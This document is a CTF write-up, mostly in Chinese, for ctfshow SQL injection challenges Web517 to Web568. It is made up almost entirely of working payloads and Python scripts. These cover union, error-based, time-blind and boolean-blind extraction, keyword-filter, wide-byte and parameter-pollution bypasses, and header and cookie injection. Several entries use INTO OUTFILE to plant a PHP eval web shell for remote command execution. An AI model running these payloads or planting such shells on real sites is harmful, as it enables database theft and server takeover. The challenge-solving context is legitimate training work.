Web517

url/?id=-1' union select 1,2, group_concat(flag) from ctfshow.flag%23

Web518

url/?id=-1 union select 1,2, group_concat(flagac) from ctfshow.flagaa %23

Web519

url/?id=-1') union select 1,23,group_concat(flagaca) from ctfshow.flagaanec %23

Web520

url/?id=-1") union select 1,2, group_concat(flag23) from ctfshow.flagsf%23

Web521

import requests

# ctfshow Web521 — time-based blind SQL injection probe.
# Recovers a value one character at a time: for each position i and candidate
# character j, the injected if(...) makes MySQL sleep(3) when the character
# matches, and the client's 3 s request timeout is used as the yes/no oracle.
url = "http://5cac5d15-e898-47df-a612-0e244ff38ccf.challenge.ctf.show/?id=-1'"
# Candidate alphabet, tried in exactly this order for every position.
string = "}abcdefghijklmnopqrstuvwxyz,0123456789-{"

if __name__ == '__main__':
    result = ''  # characters recovered so far, in position order
    for i in range(0, 48):  # i is the position handed to substr(); at most 48 positions are tried
        for j in string:
            # %23 is the URL-encoded '#' that comments out the remainder of the original query.
            end = "union select 1,2,if(substr((select group_concat(flag33) from ctfshow.flagpuck),{},1)='{}',sleep(3),1) %23".format(
                i, j)
            # Commented-out variants of the payload for the other lookups (columns,
            # tables, schemas); the author's finding for each follows it.
            # end = "union select 1,2,if(substr((select group_concat(column_name) from information_schema.columns where table_name='flagpuck'),{},1)='{}',sleep(3),1) %23".format(i, j)
            # columns in table flagpuck: id,flag33
            # end = "union select 1,2,if(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),{},1)='{}',sleep(3),1) %23".format(i, j)
            # table flagpuck in database ctfshow
            # end = "union select 1,2,if(substr((select group_concat(schema_name) from information_schema.schemata),{},1)='{}',sleep(3),1) %23".format(i, j)
            # database found: ctfshow
            try:
                # The response body is never read; only whether the request times out matters.
                req = requests.get(url + end, timeout=3)
            except:
                # Bare except: a timeout is read as "sleep(3) fired, so j is the character at
                # position i". Any other exception (connection reset, DNS failure) is counted
                # as a match as well, so transient network errors corrupt the result.
                # Server-side this traffic is a burst of near-identical GETs differing in one
                # position/character, with ~3 s responses on hits — a pattern worth alerting on.
                result += j
                print(f'[+] {result}')
                break

Web522

import requests

# ctfshow Web522 — same time-based blind probe as Web521, but the injection
# point closes a double-quoted context (-1") instead of a single-quoted one.
url = "http://11c8c313-edce-4f46-968d-f707bac1abdb.challenge.ctf.show/?id=-1\""
# Candidate alphabet, tried in exactly this order for every position.
string = "}abcdefghijklmnopqrstuvwxyz,0123456789-{"
if __name__ == '__main__':
    result = ''  # characters recovered so far, in position order
    for i in range(0, 48):  # i is the position handed to substr(); at most 48 positions are tried
        for j in string:
            end = "union select 1,2,if(substr((select group_concat(flag3a3) from ctfshow.flagpa),{},1)='{}',sleep(3),1) %23".format(i, j)
            # Commented-out variants for the other lookups; the author's finding follows each.
            # end = "union select 1,2,if(substr((select group_concat(column_name) from information_schema.columns where table_name='flagpa'),{},1)='{}',sleep(3),1) %23".format(i, j)
            # columns in table flagpuck: id,flag3a3
            # end = "union select 1,2,if(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),{},1)='{}',sleep(3),1) %23".format(i, j)
            # table flagpa in database ctfshow
            #end = "union select 1,2,if(substr((select group_concat(schema_name) from information_schema.schemata),{},1)='{}',sleep(3),1) %23".format(i, j)
            # databases found: ctfshow,ctftraining
            # Unguarded request with no timeout: its result is never used, and on a
            # match it simply blocks for the full sleep before the timed request below
            # (the one that actually acts as the oracle) is sent. Every probe is therefore
            # issued twice.
            req = requests.get(url+end)
            try:
                req = requests.get(url + end, timeout=3)
            except:
                # Bare except: any exception — timeout or plain network error — is
                # counted as a matching character.
                result += j
                print(f'[+] {result}')
                break

Web523

http://179f1583-1d65-4bcc-80d5-a6f61df29838.challenge.ctf.show/?id=-1')) union select 1,2,"<?=eval($_POST[cmd]);?>" into outfile "/var/www/html/s.php" %23

访问url/s.php去RCE

Web524-Web526

同WEB522
大同小异,都是闭合符号换了

Web527

根据回显注入, POST传入

uname=-1' union select 1,group_concat(schema_name) from information_schema.schemata %23&passwd=1
uname=-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='ctfshow' %23&passwd=1
uname=-1' union select 1,group_concat(column_name) from information_schema.columns where table_name='flagugsd' %23&passwd=1
uname=-1' union select 1,group_concat(flag43s) from ctfshow.flagugsd %23&passwd=1

时间盲注脚本

import requests

# ctfshow Web527 — time-based blind SQL injection through the POST field
# `uname`. Same oracle as the earlier scripts: sleep(3) in the injected
# if(...) versus a 3 s client timeout.
url = "http://b5cb3426-57c3-4967-9875-805ee5505fa1.challenge.ctf.show/"

# Candidate alphabet, tried in exactly this order for every position.
string = "}abcdefghijklmnopqrstuvwxyz,0123456789-{"
if __name__ == '__main__':
    result = ''  # characters recovered so far, in position order
    for i in range(1, 48):  # substr() position; positions 1..47 are tried
        for j in string:
            end = "-1' union select 1,if(substr((select group_concat(flag43s) from ctfshow.flagugsd),{},1)='{}',sleep(3),1) #".format(i, j)
            # Commented-out variants for the other lookups; the author's finding follows each.
            # end = "-1' union select 1,if(substr((select group_concat(column_name) from information_schema.columns where table_name='flagugsd'),{},1)='{}',sleep(3),1) #".format(i, j)
            # columns: id,flag43s
            # end = "-1' union select 1,if(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),{},1)='{}',sleep(3),1) #".format(i, j)
            # table flagugsd in database ctfshow
            # end = "-1' union select 1,if(substr((select group_concat(schema_name) from information_schema.schemata),{},1)='{}',sleep(3),1) #".format(i, j)
            # databases found: ctfshow,ctftraining

            # NOTE(review): {end} is a one-element *set* literal, not a string.
            # requests appears to iterate non-string values and send the single
            # element, so this works by accident — the intended value is end itself.
            data = {
                "uname": {end},
                "passwd": "1"
            }
            try:
                # Only the timeout is observed; the response body is never read.
                req = requests.post(url, data=data, timeout=3)
            except:
                # Bare except: any exception, not just a timeout, counts as a match.
                result += j
                print(f'[+] {result}')
                break

Web528

POST传入 uname=") union select 1,group_concat(flag43as) from ctfshow.flagugsds %23&passwd=1

方法过程同Web527

Web529

import requests

# ctfshow Web529 — same POST-based time-blind probe as Web527; the injected
# string now closes a quoted, parenthesised context (-1').
url = "http://7ebd4809-9e8e-4575-acf4-5a92ab2624e0.challenge.ctf.show/"

# Candidate alphabet, tried in exactly this order for every position.
string = "}abcdefghijklmnopqrstuvwxyz,0123456789-{"
if __name__ == '__main__':
    result = ''  # characters recovered so far, in position order
    for i in range(1, 48):  # substr() position; positions 1..47 are tried
        for j in string:
            end = "-1') union select 1,if(substr((select group_concat(flag4) from ctfshow.flag),{},1)='{}',sleep(3),1) #".format(i, j)
            # Commented-out variants for the other lookups; the author's finding follows each.
            #end = "-1') union select 1,if(substr((select group_concat(column_name) from information_schema.columns where table_name='flag'),{},1)='{}',sleep(3),1) #".format(i, j)
            # columns: id,flag4
            # end = "-1') union select 1,if(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),{},1)='{}',sleep(3),1) #".format(i, j)
            # table flag in database ctfshow
            # end = "-1') union select 1,if(substr((select group_concat(schema_name) from information_schema.schemata),{},1)='{}',sleep(3),1) #".format(i, j)
            # databases found: ctfshow,ctftraining

            # NOTE(review): {end} is a one-element set literal, not a string; it only
            # works because requests sends the single element of an iterable value.
            data = {
                "uname": {end},
                "passwd": "1"
            }
            try:
                # Only the timeout is observed; the response body is never read.
                req = requests.post(url, data=data, timeout=3)
            except:
                # Bare except: any exception, not just a timeout, counts as a match.
                result += j
                print(f'[+] {result}')
                break

Web530

import requests

# ctfshow Web530 — same POST-based time-blind probe as Web527; the injected
# string closes a double-quoted context (-1").
url = "http://e09f7af6-facc-4383-8e66-f29ac04461f7.challenge.ctf.show/"

# Candidate alphabet, tried in exactly this order for every position.
string = "}abcdefghijklmnopqrstuvwxyz,0123456789-{"
if __name__ == '__main__':
    result = ''  # characters recovered so far, in position order
    for i in range(1, 48):  # substr() position; positions 1..47 are tried
        for j in string:
            end = "-1\" union select 1,if(substr((select group_concat(flag4s) from ctfshow.flagb),{},1)='{}',sleep(3),1) #".format(i, j)
            # Commented-out variants for the other lookups; the author's finding follows each.
            # end = "-1\" union select 1,if(substr((select group_concat(column_name) from information_schema.columns where table_name='flagb'),{},1)='{}',sleep(3),1) #".format(i, j)
            # columns: id,flag4s
            # end = "-1\" union select 1,if(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),{},1)='{}',sleep(3),1) #".format(i, j)
            # table flagb in database ctfshow
            # end = "-1\" union select 1,if(substr((select group_concat(schema_name) from information_schema.schemata),{},1)='{}',sleep(3),1) #".format(i, j)
            # databases found: ctfshow,ctftraining

            # NOTE(review): {end} is a one-element set literal, not a string; it only
            # works because requests sends the single element of an iterable value.
            data = {
                "uname": {end},
                "passwd": "1"
            }
            try:
                # Only the timeout is observed; the response body is never read.
                req = requests.post(url, data=data, timeout=3)
            except:
                # Bare except: any exception, not just a timeout, counts as a match.
                result += j
                print(f'[+] {result}')
                break

Web531

同Web527脚本

Web532

import requests

# ctfshow Web532 — same POST-based time-blind probe as Web527; the injected
# string closes a double-quoted, parenthesised context (-1").
url = "http://68849a46-f00a-43ae-9aaf-b48009c061ec.challenge.ctf.show/"

# Candidate alphabet, tried in exactly this order for every position.
string = "}abcdefghijklmnopqrstuvwxyz,0123456789-{"
if __name__ == '__main__':
    result = ''  # characters recovered so far, in position order
    for i in range(1, 48):  # substr() position; positions 1..47 are tried
        for j in string:
            end = "-1\") union select 1,if(substr((select group_concat(flag4sa) from ctfshow.flagbab),{},1)='{}',sleep(3),1) #".format(i, j)
            # Commented-out variants for the other lookups; the author's finding follows each.
            # end = "-1\") union select 1,if(substr((select group_concat(column_name) from information_schema.columns where table_name='flagbab'),{},1)='{}',sleep(3),1) #".format(i, j)
            # columns: id,flag4sa
            # end = "-1\") union select 1,if(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),{},1)='{}',sleep(3),1) #".format(i, j)
            # table flagbab in database ctfshow
            # end = "-1\") union select 1,if(substr((select group_concat(schema_name) from information_schema.schemata),{},1)='{}',sleep(3),1) #".format(i, j)
            # databases found: ctfshow,ctftraining

            # NOTE(review): {end} is a one-element set literal, not a string; it only
            # works because requests sends the single element of an iterable value.
            data = {
                "uname": {end},
                "passwd": "1"
            }
            try:
                # Only the timeout is observed; the response body is never read.
                req = requests.post(url, data=data, timeout=3)
            except:
                # Bare except: any exception, not just a timeout, counts as a match.
                result += j
                print(f'[+] {result}')
                break

Web533

搭配上报错注入

uname=admin&passwd=admin' and updatexml(1,concat('~',(select right(flag4,30) from ctfshow.flag),0x7e),'~')#

uname=admin&passwd=admin' and updatexml(1,concat('~',(select right(flag4,30) from ctfshow.flag),0x7e),'~')#

将回显的flag进行组合

Web534

访问url,post传入 passwd=admin&uname=admin ,然后修改UA为下面的payload进行注入

'and updatexml(1,concat('~',(select group_concat(schema_name) from information_schema.schemata),'~'),1) and '
'and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),'~'),1) and '
'and updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_name='flag'),'~'),1) and '
//获取flag 需要拼接
'and updatexml(1,concat('~',(select right(flag4,50) from ctfshow.flag),'~'),1) and '
'and updatexml(1,concat('~',(select right(flag4,20) from ctfshow.flag),'~'),1) and '

Web535

访问url,post传入 passwd=admin&uname=admin ,然后修改referer为下面的payload进行注入

'and updatexml(1,concat('~',(select group_concat(schema_name) from information_schema.schemata),'~'),1) and '
'and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),'~'),1) and '
'and updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_name='flag'),'~'),1) and '
//获取flag 需要拼接
'and updatexml(1,concat('~',(select right(flag4,50) from ctfshow.flag),'~'),1) and '
'and updatexml(1,concat('~',(select right(flag4,20) from ctfshow.flag),'~'),1) and '

Web536

访问url,输入admin admin登陆 ,然后修改cookie为下面的payload进行注入

'and updatexml(1,concat('~',(select group_concat(schema_name) from information_schema.schemata),'~'),1) and '
'and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),'~'),1) and '
'and updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_name='flag'),'~'),1) and '
//获取flag 需要拼接
'and updatexml(1,concat('~',(select right(flag4,50) from ctfshow.flag),'~'),1) and '
'and updatexml(1,concat('~',(select right(flag4,20) from ctfshow.flag),'~'),1) and '

Web537

访问url,输入admin admin登陆 ,然后修改cookie为下面的payload进行注入,payload需要base64加密

'and updatexml(1,concat('~',(select group_concat(schema_name) from information_schema.schemata),'~'),1) and '
'and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),'~'),1) and '
'and updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_name='flag'),'~'),1) and '
//获取flag 需要拼接
'and updatexml(1,concat('~',(select right(flag4,50) from ctfshow.flag),'~'),1) and '
'and updatexml(1,concat('~',(select right(flag4,20) from ctfshow.flag),'~'),1) and '

Web538

执行两次payload base64加密,放入cookie

admin" and  updatexml(1,concat(0x7e,(select group_concat(flag4) from ctfshow.flag),0x7e),1)#
admin" and  updatexml(1,concat(0x7e,(select right(flag4,20) from ctfshow.flag),0x7e),1)#

Web539

url/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="ctfshow"'
url/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name="flag" '  
url/?id=-1' union select 1,2,(select group_concat(flag4) from ctfshow.flag)'  

Web540

检测到or 或者 and 会被过滤替换为空,双写绕过

url/?id=-1' union select 1,2,(select group_concat(schema_name) from infoorrmation_schema.schemata) %23
url/?id=-1' union select 1,2,(select group_concat(table_name) from infoorrmation_schema.tables where table_schema='ctfshow') %23
url/?id=-1' union select 1,2,(select group_concat(column_name) from infoorrmation_schema.columns where table_name='flags') %23
url/?id=-1' union select 1,2,(select group_concat(flag4s) from ctfshow.flags) %23

或者使用显错注入

url/?id=-1' || updatexml(1,concat(0x7e,(select group_concat(flag4s) from ctfshow.flags),0x7e),1) %23

Web541

url/?id=-1 union select 1,2,group_concat(schema_name) from infoorrmation_schema.schemata  %23
url/?id=-1 union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema='ctfshow'  %23
url/?id=-1 union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_name='flags'  %23
url/?id=-1 union select 1,2,group_concat(flag4s) from ctfshow.flags  %23

Web542

过滤了空格,绕过不了,过滤了or可双写绕过

url/?id=a'||updatexml(1,concat(0x7e,(select(group_concat(schema_name))from(infoorrmation_schema.schemata)),0x7e),1)||%270
url/?id=a'||updatexml(1,concat(0x7e,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema='ctfshow')),0x7e),1)||%270
url/?id=a'||updatexml(1,concat(0x7e,(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_name='flags')),0x7e),1)||%270

url/?id=a'|| updatexml(1,concat(0x7e,(select(right(flag4s,50))from(ctfshow.flags)),0x7e),1)||%270
url/?id=a'|| updatexml(1,concat(0x7e,(select(right(flag4s,20))from(ctfshow.flags)),0x7e),1)||%270

Web543

布尔盲注,笔者的脚本有些问题,但可以正常跑出来,最后的flag需要自己整理格式

import requests

# ctfshow Web543 — boolean-based blind SQL injection probe. Unlike the
# time-based scripts above, the oracle is page content: the injected if(...)
# yields 1 or 0, and the response is checked for the marker string "Dumb".
# Spaces are avoided in the payload (parentheses instead), matching the
# author's note that whitespace is filtered on this challenge.
url = "http://e799021a-75b8-4059-9c6e-8683f1247f3d.challenge.ctf.show/"

# Candidate alphabet, tried in exactly this order for every position.
string = "}abcdefghijklmnopqrstuvwxyz,0123456789-{"
if __name__ == '__main__':
    result = ''  # characters recovered so far, in position order
    for i in range(1, 48):  # substr() position; positions 1..47 are tried
        for j in string:
            # %27 is the URL-encoded single quote that closes the trailing literal.
            end = "?id=sibei'|| if(substr((select(group_concat(flag4s))from(ctfshow.flags)),{},1)='{}',1,0) || %270".format( i, j)
            # Commented-out variants for the other lookups; the author's finding follows each.
            # end = "?id=sibei'|| if(substr((select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_name='flags')),{},1)='{}',1,0) || %270".format( i, j)
            # columns: id,flag4s
            # end = "?id=sibei'|| if(substr((select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema='ctfshow')),{},1)='{}',1,0) || %270".format(i, j)
            # table flags in database ctfshow
            # end = "?id=sibei'|| if(substr((select(group_concat(schema_name))from(infoorrmation_schema.schemata)),{},1)='{}',1,0) || %270".format(i, j)
            # databases found: ctfshow,ctftraining

            # No timeout is set here, so a stalled server blocks the loop indefinitely.
            req = requests.get(url + end)
            # print(req.text)
            # Presumably the page shows a row containing "Dumb" only when the
            # injected condition is true — the author notes the result still needs
            # manual clean-up, so this check is not fully reliable.
            if "Dumb" in req.text:
                result += j
                print(f'[+] {result}')
                break

Web545

过滤了union和select,可以大小写绕过

import requests

# ctfshow Web545 — same boolean-blind probe as Web543. The only difference is
# the mixed-case "SeLect" keyword, which the author reports gets past a
# case-sensitive keyword filter on this challenge (a reminder that blocklist
# filters should normalise case, or better, be replaced by parameterised queries).
url = "http://3a158d9f-07a4-4fd0-9933-63d638665395.challenge.ctf.show/"

# Candidate alphabet, tried in exactly this order for every position.
string = "}abcdefghijklmnopqrstuvwxyz,0123456789-{"
if __name__ == '__main__':
    result = ''  # characters recovered so far, in position order
    for i in range(1, 48):  # substr() position; positions 1..47 are tried
        for j in string:
            # %27 is the URL-encoded single quote that closes the trailing literal.
            end = "?id=sibei'|| if(substr((SeLect(group_concat(flag4s))from(ctfshow.flags)),{},1)='{}',1,0) || %270".format( i, j)
            # Commented-out variants for the other lookups; the author's finding follows each.
            # end = "?id=sibei'|| if(substr((SeLect(group_concat(column_name))from(information_schema.columns)where(table_name='flags')),{},1)='{}',1,0) || %270".format( i, j)
            # columns: id,flag4s
            # end = "?id=sibei'|| if(substr((SeLect(group_concat(table_name))from(information_schema.tables)where(table_schema='ctfshow')),{},1)='{}',1,0) || %270".format(i, j)
            # table flags in database ctfshow
            # end = "?id=sibei'|| if(substr((SeLect(group_concat(schema_name))from(infoorrmation_schema.schemata)),{},1)='{}',1,0) || %270".format(i, j)
            # databases found: ctfshow,ctftraining

            # No timeout is set here, so a stalled server blocks the loop indefinitely.
            req = requests.get(url + end)
            # print(req.text)
            # Presumably the page shows a row containing "Dumb" only when the
            # injected condition is true.
            if "Dumb" in req.text:
                result += j
                print(f'[+] {result}')
                break

Web546

*将Web545的脚本,语句的闭合符号换为 " 即可

Web547-548

*将Web545的脚本,语句的闭合符号换为 ') (' 即可

Web549

双服务器,参数污染。详细: https://blog.csdn.net/weixin_45669205/article/details/115563306

url/?id=1&id=' union select 1,2,group_concat(schema_name) from information_schema.schemata %23
url/?id=1&id=' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ctfshow' %23
url/?id=1&id=' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='flags' %23
url/?id=1&id=' union select 1,2,group_concat(flag4s) from ctfshow.flags %23

Web550

将Web549的URL,' 换成 "

Web551

将Web549的URL,' 换成 ")

Web552-553

宽字节注入漏洞, %df、%81、%E6、�均可绕过

问题代码  mysql_query("SET NAMES gbk");

payload

url/?id=%81' union select 1,2,group_concat(flag4s) from ctfshow.flags %23

Web554

post传入
passwd=admin&uname=1�' union select 1,group_concat(flag4s) from ctfshow.flags %23

Web555

url/?id=-1 union select 1,2, group_concat(flag4s) from ctfshow.flags %23

Web556

url/?id=-1�' union select 1,2, group_concat(flag4s) from ctfshow.flags %23

Web557

POST传入

passwd=admin&uname=admin�' union select 1, group_concat(flag4s) from ctfshow.flags%23

Web558

url/?id=-1' union select 1,2,group_concat(schema_name) from information_schema.schemata %23
url/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ctfshow' %23
url/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='flags' %23
url/?id=-1' union select 1,2,group_concat(flag4s) from ctfshow.flags %23

Web559

url/?id=-1 union select 1,2,group_concat(schema_name) from information_schema.schemata %23
url/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ctfshow' %23
url/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='flags' %23
url/?id=-1 union select 1,2,group_concat(flag4s) from ctfshow.flags %23

Web560

url/?id=-1') union select 1,2,group_concat(schema_name) from information_schema.schemata %23
url/?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ctfshow' %23
url/?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='flags' %23
url/?id=-1') union select 1,2,group_concat(flag4s) from ctfshow.flags %23

Web561

url/?id=-1 union select 1,2,group_concat(schema_name) from information_schema.schemata %23
url/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ctfshow' %23
url/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='flags' %23
url/?id=-1 union select 1,2,group_concat(flag4s) from ctfshow.flags %23

Web562

import requests

# ctfshow Web562 — time-based blind SQL injection through the login form's
# password field. Same oracle as the earlier scripts: sleep(3) in the injected
# if(...) versus a 3 s client timeout.
url = "http://4ec4e5c2-203e-4298-b37c-b1dabf7c38b8.challenge.ctf.show/login.php"

# Candidate alphabet, tried in exactly this order for every position.
string = "}abcdefghijklmnopqrstuvwxyz,0123456789-{"
if __name__ == '__main__':
    result = ''  # characters recovered so far, in position order
    for i in range(1, 48):  # substr() position; positions 1..47 are tried
        for j in string:
            # Note the live payload selects three columns (1,2,if(...)) while the
            # commented-out variants select two — the column count was presumably
            # adjusted for this challenge's query.
            end = "Dumb' union select 1,2,if(substr((select group_concat(flag4s) from ctfshow.flags),{},1)='{}',sleep(3),1) #".format(i, j)
            # Commented-out variants for the other lookups; the author's finding follows each.
            # end = "Dumb' union select 1,if(substr((select group_concat(column_name) from information_schema.columns where table_name='flagbab'),{},1)='{}',sleep(3),1) #".format(i, j)
            # columns: id,flag4s
            # end = "Dumb' union select 1,if(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),{},1)='{}',sleep(3),1) #".format(i, j)
            # table flags in database ctfshow
            # end = "Dumb' union select 1,if(substr((select group_concat(schema_name) from information_schema.schemata),{},1)='{}',sleep(3),1) #".format(i, j)
            # databases found: ctfshow,ctftraining

            # Form fields of the login page; f"{end}" is just end as a string.
            data = {
                "login_password": f"{end}",
                "login_user": "Dumb",
                "mysubmit": "Login"
            }
            try:
                # Only the timeout is observed; the response body is never read.
                req = requests.post(url, data=data, timeout=3)
            except:
                # Bare except: any exception, not just a timeout, counts as a match.
                result += j
                print(f'[+] {result}')
                break

Web563

将562的脚本中的闭合符号换为')

Web564

import requests

# ctfshow Web564 — time-based blind SQL injection through the `sort` query
# parameter. The payload is injected without any closing quote, so the
# parameter is presumably interpolated unquoted (e.g. into an ORDER BY clause —
# not verifiable from this script). The delay is sleep(5) against a 5 s timeout.
url = "http://6db369c8-0ba6-434c-acef-88de140780d1.challenge.ctf.show/?sort="

# Candidate alphabet, tried in exactly this order for every position.
string = "}abcdefghijklmnopqrstuvwxyz,0123456789-{"
if __name__ == '__main__':
    result = ''  # characters recovered so far, in position order
    for i in range(1, 48):  # substr() position; positions 1..47 are tried
        for j in string:
            end = "if(substr((select group_concat(flag4s) from ctfshow.flags),{},1)='{}',sleep(5),1) ".format(i, j)
            # Commented-out variants for the other lookups; the author's finding follows each.
            # end = "if(substr((select group_concat(column_name) from information_schema.columns where table_name='flagbab'),{},1)='{}',sleep(5),1) ".format(i, j)
            # columns: id,flag4s
            # end = "if(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),{},1)='{}',sleep(5),1) ".format(i, j)
            # table flags in database ctfshow
            # end = "if(substr((select group_concat(schema_name) from information_schema.schemata),{},1)='{}',sleep(5),1)".format(i, j)
            # databases found: ctfshow,ctftraining

            try:
                # Only the timeout is observed; the response body is never read.
                req = requests.get(url+end, timeout=5)
            except:
                # Bare except: any exception, not just a timeout, counts as a match.
                # Each hit costs a full 5 s, so a complete run is slow and very visible
                # in server logs (many GETs on ?sort= that differ by one character).
                result += j
                print(f'[+] {result}')
                break

Web564

url/?sort=updatexml(1,if(1=0,1,(select right(flag4s,50)from(ctfshow.flags))),1)
url/?sort=updatexml(1,if(1=0,1,(select right(flag4s,30)from(ctfshow.flags))),1)

Web565

url/?sort=' ||updatexml(1,if(1=0,1,(select right(flag4s,50)from(ctfshow.flags))),1)
url/?sort=' ||updatexml(1,if(1=0,1,(select right(flag4s,30)from(ctfshow.flags))),1)

Web566

url/?sort=1 into outfile '/var/www/html/2.php' lines terminated by '<?php eval($_POST[cmd]) ?>'-- -

Web567

url/?sort=1 into outfile '/var/www/html/2.php' lines terminated by '<?php eval($_POST[cmd]) ?>'-- -

Web568

url/?sort=1' into outfile '/var/www/html/2.php' lines terminated by '<?php eval($_POST[cmd]) ?>'-- -
最后修改:2022 年 06 月 19 日